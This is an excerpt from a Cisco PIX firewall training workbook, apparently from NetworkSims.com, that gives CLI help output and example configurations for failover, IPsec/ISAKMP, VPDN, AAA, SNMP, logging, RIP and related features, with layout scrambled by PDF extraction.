myPIX (config)# failover ?
interface
Configure the IP address and mask to be used for failover
and/or stateful update information
interface-policy Set the policy for failover due to interface failures
key
Configure the failover shared secret
lan
Specify the unit as primary or secondary or configure the
interface and vlan to be used for failover communication
link
Configure the interface and vlan to be used as a link for
stateful update information
mac
Specify the virtual mac address for a physical interface
polltime
Configure failover poll interval
replication
timeout
Specify the failover reconnect timeout value for
asymmetrically routed sessions
<cr>
exec mode commands/options:
active
Make this system to be the active unit of the failover pair
reload-standby Force standby unit to reboot
reset
Force an unit or failover group to an unfailed state
WORD Interface name
NetworkSims.com
471

?
<cr>
myPIX (config)# failover lan ?
enable
Enable LAN-Based failover
interface Configure the interface and vlan to be used for failover
communication
unit
Configure the unit as primary or secondary
myPIX (config)# failover lan key mypix
myPIX (config)# failover lan unit primary
myPIX (config)# failover lan interface inf2

Outline
This challenge involves the configuration of failover for a secondary device over a LAN.
Objectives
Enable failover.
Example (V6.x)
myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
failover poll 2
failover lan unit secondary
show failover
NetworkSims.com
472
Example (V7.x)
myPIX (config)# failover interface ip outside 157.202.212.2 standby 157.202.212.3
myPIX (config)# failover interface ip inside 73.105.56.11 standby 73.105.56.12
myPIX (config)# failover interface ip inf2 166.209.230.11 standby 166.209.230.12
myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
failover poll 2
show failover

Outline
This challenge involves the configuration of ISAKMP.
Objectives
Define ISAKMP.
Define ISAKMP policy.
Enable ISAKMP on an interface.
Example
pixfirewall(config)# isakmp
Usage: isakmp policy <priority> authen <pre-share|rsa-sig>
isakmp policy <priority> encrypt <aes|aes-192|aes-256|des|3des>
isakmp policy <priority> hash <md5|sha>
isakmp policy <priority> group <1|2|5>
isakmp policy <priority> lifetime <seconds>
isakmp key <key-string> address <ip> [netmask <mask>] [no-xauth] [noconfig-mode]
isakmp enable <if_name>
isakmp identity <address|hostname|key-id> [<key-id-string>]
isakmp keepalive <seconds> [<retry seconds>]
isakmp nat-traversal [<natkeepalive>]
isakmp client configuration address-pool local <poolname> [<pif_name>]
isakmp peer fqdn|ip <fqdn|ip> [no-xauth] [no-config-mode]
pixfirewall(config)# help isakmp
USAGE:
isakmp am-disable
isakmp ipsec-over-tcp [port <port1>..<port10>]
isakmp disconnect-notify
(DEPRECATED) isakmp key <keystring> address <peer-address> [netmask <mask>]
[no-xauth] [no-config-mode]
NetworkSims.com
473

isakmp identity {auto|address|hostname|key_id <key_id_str>}
(DEPRECATED) isakmp keepalive <threshold> [<retry-interval>]
(DEPRECATED) isakmp client configuration address-pool local <pool-name>
[<if_name>]
(DEPRECATED) isakmp peer fqdn | ip <fqdn | ip> {no-xauth | no-mode-cfg}
isakmp policy <priority> authen {<pre-share|rsa-sig|dsa-sig>}
isakmp policy <priority> encrypt {<des|3des|aes|aes-192|aes-256>}
isakmp policy <priority> group {<1|2|5|7>}
isakmp policy <priority> hash {<md5|sha>}
isakmp reload-wait
DESCRIPTION:
isakmp
Configure ISAKMP key, peer, policy and other options
SYNTAX:
am-disable
ipsec-over-tcp
port
<port1..port10>
disconnect-notify
key
Disable inbound aggressive mode connections

Enable and configure IPSec over TCP
Set IPSec over TCP ports
Specify up to 10 IPSec over TCP ports
Enable disconnect notification to peers
Configure a pre-shared key associated with a peer
This command is deprecated. Refer to
'tunnel-group ipsec-attributes' instead
<keystring>
String (ASCII) to be used for authentication pre-share
<peer-address>
IP address of peer associated with pre-shared key
<mask>
Netmask specified in dotted-decimal notation
no-xauth
Specifies an xauth policy exception
no-mode-config
Specifies a config mode policy exception
enable
Enable ISAKMP on specified interface
<if_name>
Interface name on which to enable ISAKMP
identity
Set identity type (address,hostname or key-id)
<address>
Use IP address of the interface for the identity
<auto>
Identity auto(IP address for preshared key and
Cert DN for Cert based connections)
<hostname>
Use hostname of the device for the identity
<key-id>
Use specified key-id string for the identity
<key-id-str>
The string to be used as key-id
keepalive
Set keepalive interval. This command is deprecated.
Refer to 'tunnel-group ipsec-attributes' instead
<threshold>
Time, in seconds, peer can remain idle before
keep-alive monitoring commences
<retry-interval>
Time, in seconds, between keep-alive messages
nat-traversal
Enable and configure nat traversal
<natkeepalive>
Set nat traversal keepalive interval
<priority>
Policy suite priority (1 highest, 65535 lowest)
authentication
Authentication method (pre-share,rsa-sig or dsa-sig)
encryption
Encryption algorithm (des,3des,aes,aes-192 or aes256)
hash
Hash algorithm (md5 or sha)
group
Diffie-Hellman group (1,2,5 or 7)
lifetime
ISAKMP SA lifetime (seconds)
client configuration address-pool local
Configure client IP address pool attribute
This command is deprecated. Refer to 'ip local-pool',
'tunnel-group general-attributes address-pool' instead
<pool-name>
Name of ip local pool to allocate dynamic client ip
<if_name>
Interface name the ip local pool is associated with
Defaults to 'outside' if not specified
NetworkSims.com
474
peer
Identify a peer security gateway to exempt from Xauth

and/or Mode Configuration. This command is deprecated.
Refer to 'isakmp identity' instead
Fully qualified domain name or IP address of a remote
peer to be exempted from xauth or config mode policy
Wait for voluntary termination of sessions before reboot
<fqdn | ip>
reload-wait
see also:
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
isakmp
isakmp
isakmp
isakmp
isakmp
isakmp
isakmp
isakmp
ca, dynamic-map, ipsec, map

enable outside
key ABC&FDD address 176.16.0.2 netmask 255.255.255.255
identity address
policy 5 authen pre-share
policy 5 encrypt des
policy 5 hash sha
policy 5 group 1
policy 5 lifetime 86400
(config)# show isakmp

Outline
This challenge involves the configuration of crypto details.
Objectives
Enable IPSEC.
Apply a crypto map.
Example
(config)# help sysopt
USAGE:
[no] sysopt connection { permit-ipsec |
timewait | {tcpmss [minimum] <bytes>}
[no] sysopt noproxyarp <if-name>
[no] sysopt nodnsalias { inbound | outbound }
[no] sysopt radius ignore-secret
[no] sysopt uauth allow-http-cache
show running-config [all] sysopt
clear configure sysopt
DESCRIPTION:
sysopt
Set system functional option
SYNTAX:
NetworkSims.com
475
connection permit-ipsec
- Exempt IPSec traffic from access check.
connection timewait
- TCP conn undergoes TIMEWAIT state.
connection tcpmss
- Set maximum limit of TCP MSS to <bytes>.
connection tcpmss minimum - Set minimum limit of TCP MSS to <bytes>.
noproxyarp <if-name>
- Disable proxy arp on interface <if-name>.
nodnsalias inbound
- Disable alias inbound DNS A record translation.
nodnsalias outbound
- Disable alias outbound DNS A record translation.
radius ignore-secret
- Ignore secret in RADIUS accounting responses.
uauth allow-http-cache
- Allow browser to use cached user credentials.
see also: alias, ca, ipsec, isakmp, map, dynamic-map
(config)# sysopt connection permit-ipsec
(config)# help cry
USAGE:
crypto { ca | dynamic-map | ipsec | isakmp | key | map }
For more detailed help, please refer directly to the subcommands
DESCRIPTION:
crypto
Configure IPsec, IKE, Certificate Authority and Long Term

Key Operations
SYNTAX:
ca
Configure the Certification Authority

See "crypto ca ?" or "help ca"
dynamic-map
IPSec crypto dynamic-map policy

See "crypto dynamic-map ?" or "dynamic-map ?" or
"help dynamic-map"
ipsec
Configure transform-set and IPSec SA lifetime

See "crypto ipsec ?" or "ipsec ?" or "help ipsec"
isakmp
IKE policy and configuration

See "crypto isakmp ?" or "isakmp ?" or "help isakmp"
key
Long term key operations

See "crypto key ?" or "help key"
map
IPSec crypto map policy

See "crypto map ?" or "map ?" or "help map"
(config)# crypto ipsec transform-set MYIPSECFORMAT esp-des esp-sha-hmac

(config)# crypto map MYIPSEC 10 ipsec-isakmp
255.255.255.0
(config)# crypto map MYIPSEC 10 match address 111
(config)# crypto map MYIPSEC 10 set peer 176.16.0.2
(config)# crypto map MYIPSEC 10 set transform-set MYIPSECFORMAT
(config)# crypto map MYIPSEC interface outside

Outline
NetworkSims.com
476
This challenge involves the configuration of VPDN.

Objectives
Enable PPTP.
Define local pool.
Create VPDN group.
Enable VPDN on an interface.
Example
(config)# sysopt connection permit-pptp
(config)# help ip
USAGE:
ip local pool <poolname> <ip1>[-<ip2>] [mask <netmask>]
ip verify reverse-path interface <if_name>
ip audit {info|attack} action [alarm] [drop] [reset]
ip audit name <audit_name> {info|attack} [action [alarm] [drop] [reset]]
ip audit interface <if_name> <audit_name>
ip audit signature <sig_number> disable
show|clear ip audit count [global] [interface <interface>]
clear configure ip audit [configuration]
DESCRIPTION:
ip
Define a local address pool

Configure Unicast RPF on an interface
Configure the Intrusion Detection System
SYNTAX:
<poolname>
<ip1>-[<ip2>]
<netmask>
<if_name>
info
attack
alarm
drop
reset
<audit_name>
<sig_number>
name of the local address pool

address range of the local address pool
network mask of the local address pool
The name designated for the interface by the nameif command
IDS informational signatures.
IDS attack signatures.
When a signature match is detected, report the event
to syslog servers.
When a signature match is detected, drop the offending
packet.
packet and close the connection if it is part of an
active connection.
Audit policy name.
IDS signature number.
see also:
interface, ip address (interface sub-mode command),

show interface, isakmp
(config)# ip local pool pptp-pool 10.0.0.1-10.0.0.100
NetworkSims.com
477
(config)# help vpd

USAGE:
vpdn group <name>
accept dialin l2tp
ppp authentication pap|chap|mschap|eap
This command has been deprecated. New syntax:
tunnel-group <name> ppp-attributes
authentication pap
authentication chap
authentication mschap
authentication eap |
client configuration address local <address_pool_name> |
client configuration dns <dns_ip1> [<dns_ip2>]|
client configuration wins <wins_ip1> [<wins_ip2>]|
client authentication local|aaa <auth_aaa_group>|
client accounting <acct_aaa_group>|
l2tp tunnel hello <hello_time>
show vpdn tunnel [l2tp|pppoe] [id <tnl_id>|packets|state|summary|transport]
show vpdn session [l2tp|pppoe] [id <sess_id>|packets|state|window]
show vpdn pppinterface [id <dev_id>]
show vpdn group [<group_name>]
show vpdn username [user_name]
clear vpdn [group|interface|tunnel|username]
DESCRIPTION:
vpdn
Configure VPDN (L2TP, PPPoE) Policy
SYNTAX:
<address_pool_name>
<dns_ip>
<wins_ip>
<auth_aaa_group>
<acct_aaa_group>
<hello_time>
<if_name>
<name>
<passwd>
<tnl_id>
<sess_id>
<store-local>
see also:
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
local address pool name

DNS server ip address
WINS server ip address
Authentication AAA server group name
Accounting AAA server group name
l2tp tunnel keep-alive hello timeout value (seconds)
Interface to accept L2TP request
user name
user password
tunnel id
session id
Store in local flash instead of using external config
crypto, aaa-server, ip local pool

vpdn
vpdn
vpdn
vpdn
vpdn
vpdn
vpdn
group 1 accept dialin pptp

group 1 ppp authentication mschap
group 1 ppp encryption mppe 40
group 1 client configuration address local pptp-pool
group 1 client configuration dns 172.64.10.1
group 1 client authentication local
enable outside

Outline
NetworkSims.com
478
This challenge involves the configuration of URL filtering.

Objectives
Setup Websense.
Define URL filtering.
Define URL cache distance.
Example
(config)# help url-server
USAGE:
[no] url-server <(if_name)>
<seconds>] [protocol TCP|UDP [version
[no] url-server <(if_name)>
[timeout <seconds>] [protocol TCP|UDP
show url-server stat
clear url-server stat
[vendor websense] host <local_ip> [timeout

1|4] [connections <num_conns>]]
vendor n2h2 host <local_ip> [port <number>]
[connections <num_conns>]]
DESCRIPTION:
url-server
Specify a URL filter server
SYNTAX:
<if_name>
The network interface where the URL filtering server resides.
<vendor_name>
The url-server vendor.

The default is Websense. All configured url-servers must have
the same vendor. To change vendors first clear out the existing
url-server configuration.
<local_ip>
The IP address of the URL filtering server
[port <N>]
Optional N2H2 port value

Defines which port on the N2H2 server to connect to (for both
UDP and TCP).
All configured url-servers must have the same port. To change
first clear out the existing url-server configuration.
[timeout <N>]
Optional timeout value

Timeout value in seconds for down URL filter server
[protocol TCP|UDP [version 1|4]]

Optional definition on protocol
communicating to Websense in TCP or UDP (only applicable in 4)
and definition to talk to Websense in protocol version 1 or
protocol version 4. The optional version number defaults to 1.
The N2H2 url-server doesn't have a version number.
<num_conns>
The number of TCP connections created from the PIX to

the url-server.
stat
To print out url server usage statistics
NetworkSims.com
479
see also:
filter, url-cache
myPIX (config)# url-server (inside) vendor websense host 192.168.1.1 timeout 47
myPIX (config)# help filter
USAGE:
[no] filter url <port>[-<port>]|except <lcl_ip> <mask> <frgn_ip> <mask>
[allow] [proxy-block] [longurl-truncate | longurl-deny] [cgi-truncate]
[no] filter ftp <port>[-<port>]|except <lcl_ip> <mask> <frgn_ip> <mask>
[allow] [interact-block]
[no] filter https <port>[-<port>]|except <lcl_ip> <mask> <frgn_ip> <mask>
[allow]
[no] filter activex|java <port>[-<port>]|except <lcl_ip> <mask> <frgn_ip>
<mask>
DESCRIPTION:
filter
Enable, disable, or view URL, FTP, and HTTPS filtering
SYNTAX:
url|ftp|https|java|activex
Keyword to turn on URL, FTP, HTTPS, Java,

or ActiveX filtering
<port>[-<port>] TCP port number range
except
Create an exception to previously specified set of IP
<lcl_ip>
The address of local/internal host which is source

for connections requiring filtering.
<frgn_ip>
The address of foreign/external host which is

destination for connections requiring filtering.
<mask>
Network mask to apply to lcl_ip or frgn_ip
[allow]
When url-server is down, allow outbound <service> traffic
[proxy-block]
Prevent users from connecting to an HTTP proxy server
[longurl-truncate]
When a long URL has exceeded the buffer limit,
truncate the URL sent to the url-server by only sending the
destination hostname or IP address
[longurl-deny]
When the long URL buffer is not available, deny

outbound URL traffic
[cgi-truncate]
When a URL has a parameter list prefixed by '?' (e.g. a

CGI script) truncate the URL sent to the url-server by
removing all text after and including '?'
[interact-block]
Prevent users from connecting FTP server

by interactive FTP program
see also:
myPIX (config)#
myPIX (config)#
myPIX (config)#
url-server (Only apply on URL-filtering)

filter url http 0 0 0 0
filter url except 204.76.192.7 255.255.252.0 0 0 allow
url-cache dst 2

NetworkSims.com
480
Outline
This challenge involves the configuration of local AAA.
Objectives
Define local AAA.

Example
myPIX (config)# help aaa-server
USAGE:
[no] aaa-server <tag> <(if_name)> host <ip_address>
[no] aaa-server <tag> protocol <protocol>
clear configure aaa-server [<tag>]
show running-config [all] aaa-server [<tag> [<(if_name)>
host <ip_address>]]
show aaa-server [<tag> [host <hostname>]]
show aaa-server protocol <protocol>
clear aaa-server statistics [<tag> [host <hostname>]]
clear aaa-server statistics protocol <protocol>
test aaa-server authentication <group tag> [host <ip_address>]
[username <user>] [password <password>]
test aaa-server authorization <group tag> [host <ip_address>]
[username <user>]
DESCRIPTION:
aaa-server
Define AAA Server group
SYNTAX:
<tag>
<if_name>
Symbolic name of the server group.

The network interface where the authentication server
resides.
<local_ip>
The IP address of the AAA server.
<protocol>
The AAA protocol supported by servers in the group.
Supported protocol types are radius, tacacs+, sdi,
nt, kerberos and ldap
<acct mode>
Specify either 'simultaneous' or 'single' mode
accounting
<reactivation mode>
Specify the method by which failed servers are
reactivated. Either timed or depletion.
see also:
aaa,nameif
myPIX (config)# aaa-server orange protocol local
myPIX (config-aaa-server-group)# exit
myPIX (config)# help aaa
USAGE:
NetworkSims.com
481
[no] aaa mac-exempt match <mac-list-id>

[no] aaa authentication secure-http-client
[no] aaa authentication|authorization|accounting include|exclude <svc>
<if_name> <l_ip> <l_mask> [<f_ip> <f_mask>] <server_tag>
[no] aaa authentication serial|telnet|ssh|http|enable console
<server_tag> [LOCAL]
[no] aaa accounting telnet|ssh|http|serial|enable console <server_tag>
[no] aaa authentication|authorization|accounting match
<access_list_name> <if_name> <server_tag>
[no] aaa authorization command {LOCAL | <tacacs_server_tag> [LOCAL]}
[no] aaa accounting command {privilege <level>} <tacacs_server_tag>
[no] aaa proxy-limit <proxy limit> | disable
[no] aaa local authentication attempts max-fail <fail-attempts>
clear configure aaa
clear aaa local user {fail-attempts|lockout} {all | username <uname>}}
show running-config [all] aaa [authentication|authorization|accounting
|max-exempt|proxy-limit]
show aaa local user [lockout]
DESCRIPTION:
aaa
Enable, disable, or view TACACS+, RADIUS or LOCAL

user authentication, authorization and accounting
SYNTAX:
secure-http-client
HTTP client authentication is secured (over SSL)
include|exclude
Include or exclude the service, local and foreign network which
needs to be authenticated, authorized, and accounted
<svc>
For Authentication, use the following values:

telnet, ftp, http, https, tcp/<port> and tcp/0.
For Authorization, use the following values:
telnet, ftp, http, https, tcp/0, tcp/<port>, udp/<port>,
icmp/<port> or <protocol>[</port>]
For Accounting, use the following values:
For authentication of console access, telnet access, SSH access
and enable mode access, specify telnet|ssh|enable respectively.
<if_name>
Authenticate, authorize or account connections

originated at an interface.
<l_ip>
The address of the local/internal host which is source or

destination for connections requiring authentication
<l_mask>
Network mask to apply to <l_ip>
<f_ip>
The address of the foreign host which is either source or

<f_mask>
Network mask to apply to <f_ip>
<server_tag>
For Authentication and Accounting, use values defined

by aaa-server command.
For cut-through and 'to the box' Authentication and Command
Authorization, the server tag LOCAL, can also be used.
Only tacacs+ is supported for 'through the box' Authorization.
LOCAL
Predefined server tag for aaa protocol 'local'
NetworkSims.com
482
The server tag LOCAL can also be used as a fallback method in

case of the AAA server tag being unreachable. The AAA Fallback
is available only for 'to the box' authentication and command
authorization. The fallback method can only be LOCAL and it can
be used only if a AAA server is specified for the server_tag
<proxy limit>
Number of concurrent proxy connections allowed per user.
<fail-attempts> Number of failed authentication attempts after which user is locked

out
<uname> Locally configured username
see also:
myPIX (config)#
myPIX (config)#
myPIX (config)#
myPIX (config)#
aaa-server
username
aaa authentication http console orange
aaa authentication serial console orange
aaa authentication telnet console orange
aaa authentication enable console orange

Outline
This challenge involves the configuration of remote AAA.
Objectives
Enable AAA.
Example
myPIX (config)# aaa-server orange protocol radius
myPIX (config)# aaa-server orange (inside) host 155.109.40.4 beetroot
myPIX (config)# aaa authentication http console orange
myPIX (config)# aaa authentication serial console orange
myPIX (config)# aaa authentication telnet console orange

Outline
NetworkSims.com
483
This challenge involves the configuration of Telent, SSH, and HTTP access.
Objectives
Define Telnet access on interfaces.

Define SSH access on interfaces.
Enable HTTP server.
Define HTTP access on interfaces.
Define timeouts for servers.
Example
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
telnet 204.134.17.7 255.255.192.0 inside

telnet 201.13.14.2 255.255.240.0 outside
telnet 210.1.170.5 255.255.224.0 inf2
telnet timeout 10
show telnet
show telnet timeout
ssh 204.134.17.7 255.255.192.0 inside
ssh timeout 10
http server enable
http 204.134.17.7 255.255.192.0 inside
http 201.13.14.2 255.255.240.0 outside

Outline
Objectives
Define SNMP community.

Define SNMP host.
Enable SNMP traps.
Example
> en
NetworkSims.com
484
myPIX # config t
myPIX (config)# help snmp-server
USAGE:
[no] snmp-server community|contact|location <text>
[no] snmp-server host <if_name> <local_ip> [trap|poll]
[community <text>] [version {1|2c}] [udp-port <port>]
[no] snmp-server enable [traps [all | <feature> [<trap1> ... <trapn>]]]
show snmp-server statistics
show running-config [all] snmp-server
clear configure snmp-server
DESCRIPTION:
snmp-server
Provide SNMP and event information
SYNTAX:
community
Configure the community string.
contact
Text for mib object sysContact.
location
Text for mib object sysLocation.
<text>
The contact person name, location, or community string.
host
Specify hosts to receive SNMP traps and send SNMP polls.
<if_name>
The network interface where the SNMP management station resides.
<local_ip>
The address of the SNMP management station.
[trap|poll]
specify whether the host can poll or receive traps.

Default is both.
udp-port
Override the default SNMP trap port.

Only valid when host may receive traps.
<port>
The port to which traps will be sent.
version
SNMP version to use for notification message.
[1|2c]
Use SNMPv1 or SNMPv2c.
enable
Enable/Disable snmp-server or particular traps.
traps
Enable/disable particular traps to SNMP management station(s).
all
Enable/disable traps for all features.
<feature>
The feature for which traps are enabled.
<trapn>
A specific trap to enable.
listen-port
Configure the SNMP engine's listening port.
statistics
Show snmp-server statistics.
see also:
logging
myPIX (config)# snmp-server
Not enough arguments.
Usage: [no] snmp-server community|contact|location <text>
NetworkSims.com
485
myPIX
myPIX
myPIX
myPIX
myPIX
[no] snmp-server host [<if_name>] <local_ip> [trap|poll]

[no] snmp-server enable traps
(config)# snmp-server community oldest ro
(config)# snmp-server location edinburgh
(config)# snmp-server host inside 160.61.110.11

Outline
Objectives
Enable logging.
Example
> en
myPIX # config t
myPIX (config)# help logg
USAGE:
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
logging enable
logging timestamp
logging standby
logging debug-trace
logging emblem
logging flash-bufferwrap
logging flash-minimum-free <kbytes>
logging flash-maximum-allocation <kbytes>
logging ftp-bufferwrap
logging ftp-server <ftp-server> <path> <username> <password>
logging buffer-size <bytes>
logging permit-hostdown
logging from-address <mail-address>
logging recipient-address <mail-address> [level <level>]
logging host <in_if> <l_ip> [{tcp|6}|{udp|17}[/<port#>]]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
logging
logging
logging
logging
logging
logging
logging
logging
[format
emblem]
NetworkSims.com
console <level>|<list>
buffered <level>|<list>
mail <level>|<list>
monitor <level>|<list>
history <level>|<list>
trap <level>|<list>
message <syslog_id> level <level>
asdm <level>|<list>
486
[no] logging asdm-buffer-size <num_of_msgs>

[no] logging facility <fac>
[no] logging device-id {hostname | ipaddress <if_name>
| string <text> | context-name}
[no] logging queue <queue_size>
[no] logging rate-limit <unlimited | <num> [interval]> message
<syslog_id> (FWSM only)
[no] logging rate-limit <unlimited | <num> [interval]> level
<syslog_level> (FWSM only)
[no] logging class <class> <dest1> <level> [<dest2> <level>..]
[no] logging list <list> level <level> [class <class>]
[no] logging list <list> message <syslog_id1>[-<syslog_id2>]
clear logging buffer
clear config logging [disable | level | rate-limit | asdm]
show logging [{message [<syslog_id>|all]} | setting | asdm]
show running-config [all] logging [level | disabled | rate-limit]
DESCRIPTION:
logging
Enable logging facility
SYNTAX:
enable
timestamp
standby
debug-trace
ftp-server
<ftp-server>
<path>
<username>
<password>
buffer-size
<bytes>

Enable logging time-stamp on syslog file
Enable logging on standby unit with failover enabled
redirect debug trace output to syslog
Set external ftp server info
FTP server name or IP address
Directory PATH on ftp server for saved log file
User login on ftp server
Password for username
Specify the logging buffer size
Logging buffer in bytes. Default/min. is 4096, and
max. is 1048576 bytes
permit-hostdown Allow new connection even if TCP syslog server
is down
class
Specify logging event class
<class>
Logging event class name
<destN>
Logging output destination, ie: console, buffer...
list
Specify logging event list
<list>
Logging event list name
host
Send messages to a host
console
buffered
Copy logging messages to an internal buffer
history
Set SNMP Syslog traps logging level
trap
Set Syslog messages logging level
asdm
Set ASDM logging syslog level
asdm-buffer-size
Set ASDM logging buffer size
message
Disable reporting of this syslog message
device-id
Include the specified device ID in all non-EMBLEM
syslog messages
context-name
Sets the device ID to be the name of the current context
rate-limit
Limit the rate at which syslog is generated
unlimited
Keyword to denote rate limit is disabled
<in_if>
The internal interface name, as specified
by the 'nameif' command
<l_ip>
The IP address of the host receiving the syslog messages
<emblem>
Log messages in Cisco EMBLEM format (available only for UDP)
<fac>
Eight facilities, 16(LOCAL0) - 23(LOCAL7)
The default is 20(LOCAL4), syslog hosts organize messages
based on the facility number. The facility may also be set to
0 - 15, but is only recommended for system use.
NetworkSims.com
487
<level>
Sets the level above which the device suppresses

messages to the syslog host
0 - System Unusable
1 - Take Immediate Action
2 - Critical Condition
3 - Error Message
4 - Warning Message
5 - Normal but significant condition
6 - Informational
7 - Debug Message
<syslog_id>
The ID of the syslog to suppress reporting
<num>
Number at which the syslog(s) is to be rate limited
<interval>
Time interval (in seconds) over which the syslogs should
be limited to 'num. This parameter is optional and if not
specified the default is 1 sec
<syslog_level> The level for which all the syslogs should be rate limited
<queue_size>
The length limit of log queue, 0 - unlimited
<if_name>
interface name
<text>
user-defined device ID
all
This displays all the syslog_ids and their corresponding levels
from-address
Specify from address of mail logging message
recipient-address
Specify recipient address of mail logging message.
A maximum of 5 recipient addresses can be specified
flash-bufferwrap
Save logging buffer to flash when buffer wraps
ftp-bufferwrap
Save logging buffer to external ftp server when
buffer wraps
flash-minimum-free
Minimum free flash space logging must maintain
flash-maximum-allocation
Maximum flash space logging can consume
<kbytes>
Size in Kilo Bytes
myPIX (config)# logging ?
Usage: [no] logging on
[no] logging timestamp
[no] logging standby
[no] logging host [<in_if>] <l_ip> [tcp|udp/port#] [format {emblem}]
[no] logging console <level>
[no] logging buffered <level>
[no] logging monitor <level>
[no] logging history <level>
[no] logging trap <level>
[no] logging message <syslog_id> level <level>
[no] logging device-id hostname | ipaddress <if_name>
| string <text>
logging queue <queue_size>
show logging [{message [<syslog_id>|all]} | level | disabled]
myPIX (config)# logging on
myPIX (config)# logging host 197.38.34.10
myPIX (config)# logging trap informational
myPIX (config)# logging monitor informational
myPIX (config)# loggin console informational
myPIX (config)# logging buffer informational

Outline
This challenge involves the configuration of PPPoE.
NetworkSims.com
488
Objectives
Define IP addresses of interfaces.

Define a VPDN group.
Apply PPPoE.
Example (Ver 6.x)

myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
# config t
(config)# vpdn group 7 request dialout pppoe
(config)# vpdn group 7 localname newmexico
(config)# vpdn group 7 ppp authen pap
(config)# vpdn username daniel password dates
(config)# ip address outside pppoe setroute
Example (Ver 7.x)

myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
(config)# int e0
(config-if)# nameif outside
(config-if)# exit
(config)# int e1
(config-if)# nameif inside
(config-if)# exit
(config)# int e2
(config-if)# nameif inf2
(config-if)# exit
(config)# vpdn group 7 request dialout pppoe
(config)# vpdn group 7 localname newmexico
(config)# vpdn group 7 ppp authen pap
(config)# vpdn username daniel password dates
(config)# ip address outside pppoe setroute

Outline
This challenge involves the configuration of RIP on interfaces.
Objectives
NetworkSims.com
489
Define RIP listening version on interfaces.
Example
myPIX (config)# help rip
USAGE:
[no] rip <if_name> default|passive [version <1|2>]
[authentication <text|md5> <key> <key id>]
DESCRIPTION:
rip
Broadcast default route or passive RIP
SYNTAX:
<if_name>

to set the RIP parameters for
default
Cause the Firewall to broadcast a default route
passive
Enable the Firewall to passively listen to RIP updates
[version <1|2>] Send/receive RIPv1 or RIPv2 packets (no authentication)

Default is RIPv1.
[authentication <text|md5> <key> <key id>] Specify authentication.
<text|md5>
Authenticate using the specified mode
<key>
The shared key to be used for authentication (16 chars. MAX)
<key id>
The shared key id that matches the <key> (0 - 255)
see also:
myPIX (config)#
myPIX (config)#
myPIX (config)#
route, ping
rip outside passive version 1
rip inside passive version 1
rip inf2 passive version 1

Outline
This challenge involves the configuration of multicast protocol.
Objectives
Define multicast interface.
NetworkSims.com
490
Define multicast parameters.
Example
myPIX # config t
myPIX (config)# multicast interface outside
myPIX(config-multicast)# igmp max 39
myPIX(config-multicast)# igmp version 2
myPIX(config-multicast)# igmp query-interval 33
myPIX(config-multicast)# igmp query-max 17
myPIX(config-multicast)# igmp forward interface inside
myPIX(config-multicast)# exit
myPIX (config)# multicast interface inside
myPIX(config-multicast)# exit
myPIX (config)# multicast interface inf2

Outline
This challenge involves the configuration of IDS signatures.
Objectives
Define IP audit rules.

Remove IDS signatures.
Example
myPIX # config t
myPIX (config)# help ip
USAGE:
DESCRIPTION:
ip

NetworkSims.com
491
SYNTAX:
<poolname>
<ip1>-[<ip2>]
<netmask>
<if_name>
info
attack
alarm
drop
reset
<audit_name>
<sig_number>
see also:
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#

to syslog servers.
packet.
active connection.
Audit policy name.
ip audit info action alarm
ip audit attack action alarm
ip audit signature 1001 disable

Outline
This challenge involves the configuration of fragment guards.
Objectives
Define fragment size.

Define fragment timeout.
Define ARP timeout.
Define names.
Example
myPIX # config t
myPIX (config)# sysopt security fragguard
myPIX (config)# help fragment
USAGE:
NetworkSims.com
492
fragment {size|chain|timeout} <limit> [<interface>]

no fragment {size|chain|timeout} <limit> <interface>
show fragment [<interface>]
show running-config [all] fragment [<interface>]
clear configure fragment [<interface>]
clear fragment {queue|statistics} [<interface>]
DESCRIPTION:
fragment
Configure and display statistics of the IP fragment database
SYNTAX:
size
<limit>
chain
<limit>
timeout <limit>
queue
statistics
<interface>
myPIX (config)#
myPIX (config)#
myPIX (config)#
myPIX (config)#
- maximum number of blocks in database, range <1-30000>

- maximum number of element in a fragment set, range <1-8200>
- number of seconds to assemble a fragment set, range <1-30>
- IP reassembly queue
- IP reassembly statistics
- name of interface
fragment size 900
fragment chain 25
fragment timeout 5
help arp
USAGE:
[no] arp <if_name> <ip> <mac> [alias]
[no] arp timeout <seconds>
show arp [statistics]
clear arp [statistics]
show running-config [all] arp [timeout]
clear configure arp
DESCRIPTION:
arp
Change or view the ARP table, add or delete static ARP entries,
set or clear the ARP timeout value and clear ARP statistics
SYNTAX:
<if_name>
The interface name whose arp table will be changed or viewed
<ip>
IP address for an arp table entry
<mac>
Hardware 6 byte MAC address specified as XX:XX:XX:XX:XX:XX

or XXXX.XXXX.XXXX
alias
Proxy ARP for this static entry
<seconds>
Duration for which the dynamic ARP entries will remain

in the table
statistics
myPIX (config)#
myPIX (config)#
myPIX (config)#
myPIX (config)#
Statistics of the arp module

arp timeout 12718
name 210.139.173.7 newhampshire
name 155.146.19.10 fife
name illinois 212.176.154.6

NetworkSims.com
493
Outline
This challenge involves the configuration of MTU for each interface.
Objectives
Define the name and security level of each interface.

Define the IP address and subnet mask of each interface.
Define the MTU for each interface.
Example
myPIX
myPIX
myPIX
myPIX
myPIX
# config t
(config)# nameif e0 delaware security_0
(config)# ip address delaware 134.100.122.5 255.255.252.0
(config)# help mtu
USAGE:
mtu <if_name> <bytes> | (300-65535)
DESCRIPTION:
mtu
Specify MTU(Maximum Transmission Unit) for an interface
SYNTAX:
<if_name>
The interface name specified in the nameif command
<bytes>
The number of bytes from 300-65535 for the MTU
pixfirewall(config)# help multicast-r

USAGE:
[no] multicast-routing
